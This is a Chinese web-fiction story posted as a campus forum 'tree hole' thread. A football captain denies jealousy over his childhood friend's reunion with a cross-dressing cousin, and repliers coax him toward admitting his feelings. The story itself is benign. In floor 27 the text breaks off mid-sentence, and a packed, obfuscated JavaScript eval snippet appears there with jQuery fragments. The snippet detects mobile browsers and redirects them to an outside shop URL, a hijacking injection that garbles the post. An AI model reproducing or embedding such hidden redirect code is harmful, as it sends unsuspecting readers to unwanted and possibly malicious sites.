标题:【树洞】竹马脱单了如何调理?急,在线等,挺急的。
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
如题。
楼主京华大三,男的,体育生,足球队队长。自认心理素质过硬,见过大风大浪,但今晚这事儿属实给我整不会了。甚至现在手还在抖,打字都慢半拍。
事情是这样的。我有个竹马,从小穿一条裤子长大的那种。
这哥们儿,我就叫他A吧。A这人,怎么形容呢?如果我是糙汉子,他就是那精细瓷娃娃。身高178,黑发如墨、肤白如玉、鼻梁高挺、五官轮廓利落分明,眼眸深邃若寒星,反正从小到大收到的情书能把他书包塞爆。但他性格特别……寡淡。书香门第出来的,家教好得离谱,对人温和有礼,但那是对所有人的礼貌,实际上骨子里冷淡得很,跟个不开窍的木头似的。
我就不一样了,我190,大大咧咧,平时就爱踢球撸铁。我俩这配置,从小到大都是我在罩着他。小时候谁敢欺负他文静,我直接上去就是一个擒拿。我都习惯了,他是我的“重点保护对象”。
重点来了!!!
今天周末,A跟我说他要去校门口接个“很重要的人”。我当时也没多想,还开玩笑问是不是哪个不长眼的导师又要抓壮丁。结果这哥们儿红着耳朵根看我一眼,说:“不是导师,是个……我很久没见的亲戚。”
我当时心里就咯噔一下。真的,我有种不祥的预感。
晚上我练完球,本来打算去图书馆找他一起回宿舍(我们住隔壁班,习惯了一起走)。结果还没到图书馆,就在那个著名的“情人坡”小树林旁边看见了那一幕。
昏黄的路灯下,A穿着那件我最喜欢的米色风衣(我送他的生日礼物),手里提着两杯奶茶。他对面站着一个人。
那人长得是真好看。波浪卷发披肩,风衣配长靴,身量高挑纤细,气质特别成熟,看着得有二十好几。关键是,她挽着A的胳膊!!!
你们能想象吗?那个连男生碰一下都要下意识躲开、跟我勾肩搭背都要皱眉嫌弃我有汗味的A,竟然任由那个人挽着胳膊!
而且,那个人还伸手帮A整理了一下衣领,动作亲昵得不行。A不仅没躲,还低头冲人家笑!
那个笑啊……我跟A认识十五年,除了小时候他妈喂他吃糖,我很少见他笑得那么……那么“软”。平时他对我笑都是那种“礼貌而不失尴尬的微笑”,或者是那种“你又发什么神经”的无奈笑。
我当时整个人都裂开了。
我就像个傻子一样抱着足球站在树后面。然后我就听见那个人说:“这次回国就不走了,以后还要麻烦圆圆多带带我熟悉环境。”
回国!不走了!还要他带!
A回了一句:“应该的。”
呵呵,明明长发及腰还嘴硬说是表哥。
谁家表哥会用那种眼神看表弟啊?而且这明明就是表姐吧!哪个表哥能这么仙气飘飘温柔似水??
我当时脑子一热,加上刚练完球肾上腺素还没退,直接就冲出去了。
我走过去,特别大声地喊了一句:“哎哟,这不是A吗?这么巧啊!”
那个人松开了手。A看到我,眼神瞬间就冷下来了,跟我刚才看见的判若两人。他皱着眉看我:“你怎么在这?一身汗。”
我说:“练球啊!这是谁啊?”我承认我当时语气很冲,跟吃了枪药似的。
A看了那人一眼,淡淡地说:“我表哥,刚从国外回来。这是……我发小,张扬。”
那人笑眯眯地看我,声音低低的,还挺好听:“哦?就是那个经常在你嘴里提到的‘足球莽夫’?”
A的脸瞬间红了:“哥,别乱说。”
那一刻,我突然觉得自己很多余。
真的,我就像个闯入高雅画展的野猪。人家那是书香门第的知性重逢,我是满身臭汗的野蛮生长。
后来我就找了个借口溜了。回宿舍的路上我越想越不对劲,越想越憋屈。
A以前什么都跟我说的。他去哪,吃什么,几点回,都会跟我报备。这次这么大的事,还要接风洗尘,他居然一句都没跟我提?直到今天被我发现?
而且,那个人叫A的小名“圆圆”,叫得我鸡皮疙瘩都起来了。A最讨厌别人叫他小名,连我都不让叫,叫一次他能跟我急眼三天,结果那人一叫,他就红耳朵?
我现在就在想,这哥们儿是不是要脱单了?虽然他说那是表哥,但表哥也不能挽胳膊吧?表哥也不能叫小名吧?表哥也不能用那种眼神看表弟吧?
而且那个表哥长那么好看干什么?一个大男人留什么长头发穿什么风衣长靴?给谁看啊?
不对,重点不是这个。
重点是,如果A真的谈恋爱了,我该怎么办?
我突然发现,我的生活里好像全是他的影子。早上叫他起床,中午给他占座,晚上陪他自习,周末带他去吃好吃的。如果多了一个表哥,或者别的什么人,我是不是就要退出了?
这种感觉太恶心了。像心爱的玩具被别人抢走了。
不对,不是玩具。
像……像什么我也说不上来。反正就是堵得慌。
我是不是占有欲太强了?但我对他真没那种意思啊!我是直男!纯的!
有没有懂行的兄弟支个招,这种疑似“被截胡”的心态怎么调理?我现在看谁都不顺眼,刚才室友问我吃不吃夜宵,我差点把他头打爆。
在线等,挺急的。明天还要一起早饭,我不知道该怎么面对他。
更不知道该怎么面对那个“表哥”。
——
1楼【置顶】管理员:
同学请冷静,网络不是法外之地。另,已根据内容推测出当事人身份,已联系相关学院辅导员关注学生心理健康。祝您早日调理成功。
2楼匿名用户:
等等楼主,你说了三遍“我是直男”。
真正直男不会强调三遍的兄弟。
另外,你确定那是“表姐”?人家A亲口说的表哥,你给人家强行改性别?
3楼匿名用户:
楼主啊,你描述竹马的用词是“黑发如墨、肤白如玉、鼻梁高挺、眼眸深邃若寒星”。
描述自己的用词是“190,大大咧咧,踢球撸铁”。
你自己品,你细品。
4楼楼主:
回3楼:这不是陈述事实吗?他本来就长得好看,我本来就长得糙,这有什么问题?
而且我这是着急,着急的时候谁还想着怎么遣词造句啊!
5楼匿名用户:
回4楼:问题就是你太陈述事实了。
正常直男提起兄弟会这么细节吗?“鼻梁高挺眼眸深邃”……兄弟,你搁这相亲呢?
6楼只有学习能使我快乐:
楼主,我没有嘲笑你的意思,我是真心发问:
你有没有可能,我是说万一,亿万分之一的可能——
你对你家竹马,不是单纯的兄弟情?
7楼楼主:
回6楼:不可能!
绝对不可能!
我们十几年的兄弟,我看着他长大的,怎么可能有那种想法?
我就是……就是习惯了他在我旁边。突然有个人挤进来,我不适应而已。
换了谁都会不适应的,对吧?
8楼匿名用户:
回7楼:不对。
我不会因为我兄弟跟他表哥挽胳膊就手抖得打字都慢半拍。
我也不会因为我兄弟对他表哥笑一下就觉得“整个人都裂开了”。
我更不会因为我兄弟有别的亲戚大老远来看他,就焦虑到想掀食堂。
楼主,你这是吃醋。而且是醋意滔天的那种。
9楼楼主:
吃醋???
我吃什么醋?我又不喜欢他!
我这是……这是兄弟被抢走的不爽!
你养了十四年的狗突然跟别人走了,你难不难过?
10楼匿名用户:
回9楼:
第一,你把你竹马比作狗,他知道了你这辈子别想再碰他一下。
第二,狗被抢走了你难过几天就没事了,但你现在这状态是要死要活。
第三,正常人不会因为兄弟有了别的社交圈就崩溃,除非这个兄弟对他而言不只是兄弟。
楼主,我不是在骂你,我是真的觉得你需要想清楚一件事——
你对他的依赖,可能比你以为的深得多。
11楼匿名用户:
楼主,我冒昧问一句:
你今天冲出去打断他们的时候,脑子里想的是什么?
是“这小子居然瞒着我见别人”?还是“她凭什么挽他胳膊”?
是“他怎么不对我这么笑”?还是“他为什么红耳朵”?
你仔细想想,你当时最在意的是什么。
12楼楼主:
回11楼:……
我在意他为什么瞒着我。
在意他对那个人笑。
在意那个人叫他小名他不生气。
在意那个人挽他胳膊他不躲。
在意他看那个人的眼神那么……那么软。
我是不是有病?
13楼匿名用户:
回12楼:你不是有病。
你是喜欢他。
14楼楼主:
回13楼:我说了不喜欢!
我就是……就是占有欲强。
我从小就这样,我的东西别人不能碰。铅笔盒不行,足球不行,他更不行。
这跟喜不喜欢没关系。
15楼匿名用户:
回14楼:那你为什么不想想——
你为什么把他划进“我的东西”这个范围里?
你那么多兄弟,足球队十几号人,你怎么不去占有他们?
16楼楼主:
回15楼:……
他们又不是他。
17楼匿名用户:
回16楼:……
楼主,这句“他们又不是他”,比一百句“我喜欢你”都真。
你自己慢慢品吧,我先哭一会儿。
18楼京华动漫社-后勤部长:
等等等等!我爬完楼了!
楼主!你说的那个“波浪卷发、长靴风衣、气质成熟”的表哥,是不是大概这么高,说话声音偏低,笑起来眼角有颗痣?
我靠!我认识!那是我们社团前前前任社长,顾远洲!京华美院毕业的,现在在法国做自由插画师!
他是顾辞的表哥,远房的,但两个人小时候一起在江南老宅住过好几年。
而且——顾远洲是男的!纯男!但他女装是大佬级别!去年漫展那个约尔简直封神!
所以他不是“表姐”,他是真·表哥,只是穿了女装来接风。
楼主,你情敌段位有点高。
19楼楼主:
回18楼:……
什么叫情敌?
他不是我情敌,我又不喜欢A。
我就是……就是觉得这个人出现得太突然了。
而且他为什么穿女装?正常接风穿成这样?故意的吧?
20楼匿名用户:
回19楼:他为什么穿女装,你心里没数吗?
一个男人,漂洋过海飞十几个小时回来,精心打扮成对方可能会喜欢的样子,在情人坡等人——
你说他为什么?
他想让顾辞看见“另一种可能”。
你居然还在纠结他是男是女?重点是他喜欢顾辞啊兄弟!
21楼楼主:
回20楼:他喜欢顾辞???
他不是表哥吗???
表哥能喜欢表弟吗???
这不是乱来吗???
22楼匿名用户:
回21楼:远房表哥,法律允许,道德也没问题。
而且你现在的重点居然是“表哥不能喜欢表弟”?
你刚才自己说了三遍“我是直男”,现在又说“表哥不能喜欢表弟”——
你是不是觉得只要论证了这个“喜欢”是不合理的,你心里就能好受点?
你是不是其实在怕——怕顾辞也喜欢他?
23楼楼主:
回22楼:……
我为什么要怕顾辞喜欢他?
顾辞喜欢谁是他的自由。
我凭什么管。
我就是觉得……觉得那个顾远洲配不上他。
24楼匿名用户:
回23楼:那你觉得谁配得上?
25楼楼主:
回24楼:至少不是我这样的。
我一个踢球的,糙得要命,连他看什么书都记不住。
他写论文我帮不上忙,他听音乐会我能睡着。
他跟我在一起,除了吃饭就是自习,无聊死了。
那个顾远洲,搞艺术的,长得好看,说话又好听,跟他有共同话题,还有童年回忆——
我拿什么比?
26楼匿名用户:
回25楼:……
楼主,你刚才是不是不小心把心里话说出来了?
“我拿什么比”?
你为什么要跟他比?
你不是说你不喜欢顾辞吗?
27楼楼主:
回26楼:……
我没说我喜欢他。
我
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382513|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
就是……就是不想输给那个人。
这跟喜不喜欢没关系。
你们别瞎猜了,我去睡觉了,明天还要早起给他买包子。
28楼匿名用户:
回27楼:给他买包子?
你们不是住隔壁吗?食堂不顺路吗?为什么要你买?
29楼楼主:
回28楼:他爱吃那家虾仁小笼包,但起不来那么早。
我训练起得早,顺便就帮他带了。
这有什么问题?
30楼匿名用户:
回29楼:没问题。
顺便帮兄弟带了三年的早饭,风雨无阻。
顺便记得他爱吃哪家、爱吃什么馅、豆浆要热的、醋要单独放。
顺便到点叫他起床,顺便给他占座,顺便陪他自习,顺便把自己的生活过成他的影子。
顺便了十四年。
楼主,你管这叫“顺便”?
31楼匿名用户:
楼主,我有个问题想问你很久了:
你给他买了三年包子,他知道是你特意早起去排队的吗?
32楼楼主:
回31楼:知道啊。
我说过,我喜欢晨跑,跑完正好路过那家店。
这不是实话吗?
33楼匿名用户:
回32楼:晨跑和排队买包子是两回事。
晨跑你可以跑任何路线,但你每天专门跑到东区那家店门口排队十五分钟,然后拎着包子再跑回西区宿舍楼下等他——
这叫“晨跑路线规划得很有心”。
你有没有想过,你为什么愿意做这些?
34楼楼主:
回33楼:……
因为他是A。
他是我兄弟,我不对他好对谁好?
35楼匿名用户:
回34楼:你有没有对足球队其他兄弟这么好?
比如你那个室友,昨晚问你吃不吃夜宵被你差点打爆头的那个。
你给他带过三年早饭吗?
36楼楼主:
回35楼:他又不吃虾仁小笼包。
37楼匿名用户:
回36楼:你看,你连他室友爱吃什么都不知道,但你记得A吃包子要单独放醋。
这不是“对兄弟好”,这是“只对这个人好”。
楼主,你真的没有想过吗?
38楼楼主:
回37楼:……
我不知道。
我现在脑子很乱。
我今天晚上看见他对着那个人笑,我第一反应不是“他有新朋友了真替他高兴”。
我第一反应是“他为什么不对我这样笑”。
我觉得我可能真的有问题。
但我不知道这是什么问题。
我从来没想过这个问题。
39楼匿名用户:
回38楼:没事的楼主,慢慢想。
十四年都等了,不差这一个晚上。
你先去睡,明天还要早起买包子呢。
买到包子就是胜利。
40楼匿名用户:
话说回来,只有我在心疼顾远洲吗?
从法国飞回来,精心打扮,鼓起勇气来见暗恋多年的表弟——
结果发现表弟身边有个发小,看表弟的眼神比他还专注,买包子买了三年,叫起床叫了三年。
他大概一眼就看出来,自己没机会了。
但他什么都没说,还笑着问“就是那个经常在你嘴里提到的足球莽夫”。
他在替顾辞试探你。
他想知道,你是不是那个值得顾辞等的人。
41楼匿名用户:
回40楼:你别说了,我眼泪下来了。
顾远洲那种“我喜欢你,但我知道你喜欢他,所以我就帮你看看他好不好”——
这是什么苦情男二剧本。
42楼匿名用户:
所以现在的情况是:
顾远洲喜欢顾辞,暗恋多年不敢开口。
顾辞可能也喜欢顾远洲?不确定,但至少对他很亲近。
而楼主,一个口口声声“我是直男”的体育生,因为竹马的表哥出现,醋得在树洞里写小作文写到凌晨。
你们仨把日子过好比什么都强。
43楼匿名用户:
楼主呢?不会真的去睡了吧?
明天还有战役要打啊!
顾远洲会不会也在早饭桌上?你准备好了吗?
你要叫他什么?“哥”?“顾先生”?“那个谁”?
44楼楼主:
回43楼:没睡。
躺在床上,睡不着。
我不知道明天怎么面对他。
更不知道怎么面对那个顾远洲。
我刚才给A发了微信,问他到了没。
他回我:“到了。他在收拾东西,我等你明早过来吃早饭。”
他说“等你”。
我不知道为什么,看见这个“等”字,突然就不那么难受了。
他还在等我。
至少明天早上,他还是会坐在老位置,等我带着包子去找他。
这就够了。
至于其他的,我不知道。
也不想想了。
45楼匿名用户:
回44楼:……
楼主,你知道吗,你这句话也很真。
“他还在等我”——
你已经把“他等我”当成理所当然的事情了。
你有没有想过,他为什么愿意等你?
46楼楼主:
回45楼:因为我们是兄弟啊。
从小就这样。
他等我下课,我等他放学。
习惯了。
47楼匿名用户:
回46楼:那你有没有想过,有一天他不等你了呢?
如果那个顾远洲真的留下来,每天都来接他、陪他、对他好。
他还会坐在老位置,等你带着包子去找他吗?
48楼楼主:
回47楼:……
我不知道。
你别问了。
我明天还要早起。
49楼匿名用户:
回48楼:好,不问了。
楼主晚安。
明天记得买包子。
不管发生什么,先买到包子再说。
50楼匿名用户:
楼主,我是13楼那个。
刚才没忍心告诉你,但我还是想说——
顾辞那篇随笔,最后还有一句。
“夏天的雷雨不知道自己是夏天,也不知道雷雨过后会有彩虹。”
晚安。